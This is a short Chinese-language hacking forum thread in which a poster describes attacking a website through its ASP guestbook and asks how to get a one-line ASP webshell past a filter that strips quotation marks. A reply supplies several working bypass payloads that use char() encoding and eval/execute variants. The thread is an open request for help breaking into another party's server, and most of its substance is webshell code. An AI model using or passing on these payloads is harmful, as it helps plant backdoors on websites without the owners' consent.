[讨论]关于一句话如果绕过网站的过滤限制
议题作者:kyo-esr信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])
今天碰到一个棘手的问题,日一个站日了半天愣是没有办法,都是静态页面,最后google了一下,竟然有asp的留言版~~
直接插入一句话,留完言后一看, <%execute request("value")%>给过滤成<%execute request("value"):sweat:
[localimg=400,46]截图[/localimg]
晕,以前碰到的都是直接过滤了百分号的,这次过滤了引号,头一次遇到:mad:
"过滤成了"
改怎么改写一句话才能绕过?
thk:loveliness: 过滤引号是可以搞定的,你搜索下! <%execute request(char(97))%>
<%eval request(char(97))%> %><%execute request("yy")%>
页:
[1]